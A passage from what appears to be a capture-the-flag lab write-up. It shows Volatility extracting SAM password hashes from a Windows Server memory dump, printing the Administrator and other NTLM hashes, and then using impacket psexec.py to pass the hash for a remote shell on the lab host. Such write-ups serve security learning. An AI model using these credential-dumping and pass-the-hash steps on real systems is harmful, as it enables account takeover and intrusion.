                           [33]: KB3023266
                           [34]: KB3024751
                           [35]: KB3024755
                           [36]: KB3029603
                           [37]: KB3030377
                           [38]: KB3030947
                           [39]: KB3033446
                           [40]: KB3035126
                           [41]: KB3036612
                           [42]: KB3037576
                           [43]: KB3037924
                           [44]: KB3038002
                           [45]: KB3042085
                           [46]: KB3043812
                           [47]: KB3044374
                           [48]: KB3044673
                           [49]: KB3045634
                           [50]: KB3045685
                           [51]: KB3045717
                           [52]: KB3045719
                           [53]: KB3045755
                           [54]: KB3045992
                           [55]: KB3045999
                           [56]: KB3046017
                           [57]: KB3046737
                           [58]: KB3048043
                           [59]: KB3054169
                           [60]: KB3054203
                           [61]: KB3054256
                           [62]: KB3054464
                           [63]: KB3055323
                           [64]: KB3055343
                           [65]: KB3055642
                           [66]: KB3059317
                           [67]: KB3060681
                           [68]: KB3060793
                           [69]: KB3061512
                           [70]: KB3063843
                           [71]: KB3071756
                           [72]: KB3072307
                           [73]: KB3074228
                           [74]: KB3074545
                           [75]: KB3075220
                           [76]: KB3077715
                           [77]: KB3078405
                           [78]: KB3078676
                           [79]: KB3080042
                           [80]: KB3080149
                           [81]: KB3082089
                           [82]: KB3084135
                           [83]: KB3086255
                           [84]: KB3087041
                           [85]: KB3087137
                           [86]: KB3091297
                           [87]: KB3092601
                           [88]: KB3092627
                           [89]: KB3094486
                           [90]: KB3095701
                           [91]: KB3097992
                           [92]: KB3099834
                           [93]: KB3100473
                           [94]: KB3103616
                           [95]: KB3103696
                           [96]: KB3103709
                           [97]: KB3109103
                           [98]: KB3109976
                           [99]: KB3110329
                           [100]: KB3115224
                           [101]: KB3121261
                           [102]: KB3121461
                           [103]: KB3122651
                           [104]: KB3123245
                           [105]: KB3126033
                           [106]: KB3126434
                           [107]: KB3126587
                           [108]: KB3127222
                           [109]: KB3128650
                           [110]: KB3133043
                           [111]: KB3133690
                           [112]: KB3134179
                           [113]: KB3134815
                           [114]: KB3137728
                           [115]: KB3138602
                           [116]: KB3139164
                           [117]: KB3139398
                           [118]: KB3139914
                           [119]: KB3140219
                           [120]: KB3140234
                           [121]: KB3145384
                           [122]: KB3145432
                           [123]: KB3146604
                           [124]: KB3146723
                           [125]: KB3146751
                           [126]: KB3147071
                           [127]: KB3153704
                           [128]: KB3155784
                           [129]: KB3156059
                           [130]: KB3159398
                           [131]: KB3161949
                           [132]: KB3161958
                           [133]: KB3162343
                           [134]: KB3169704
                           [135]: KB3172614
                           [136]: KB3172729
                           [137]: KB3173424
                           [138]: KB3175024
                           [139]: KB3178539
                           [140]: KB3179574
                           [141]: KB3186539
                           [142]: KB4033369
                           [143]: KB4033428
                           [144]: KB4040972
                           [145]: KB4040974
                           [146]: KB4040981
                           [147]: KB4041777
                           [148]: KB4054854
                           [149]: KB4054519
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.82
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

After running systeminfo I find that I can use this profile Win2012R2x64. To see all available profiles run python2 /opt/volatility/vol.py --info

First, find offsets for the registry hives in memory with hivelist, and then use the hashdump plugin:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
python2 /opt/volatility/vol.py -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist

Volatility Foundation Volatility Framework 2.6.1
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat

For hashdump two offsets are needed SYS_OFFSET and SAM_OFFSET virtual, not physical offsets.

1
2
3
4
5
6
python2 /opt/volatility/vol.py -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000   

Volatility Foundation Volatility Framework 2.6.1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::

psexec.py. One of the most commonly used tools in impacket is psexec.py. Psexec.py is named after the tool from Microsoft’s Sysinternals suite since it performs the same function: it allows us to execute a fully interactive shell on remote Windows machines

1
2
// Usage
psexec.py [-hashes LMHASH:NTHASH] [-target-ip ip address] target

/usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82

Skills Learned

  • Enumerating Oracle SIDs
  • Enumerating Oracle credentials
  • Leveraging Oracle to upload and execute files

Hong Woo
WRITTEN BY
Hong
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing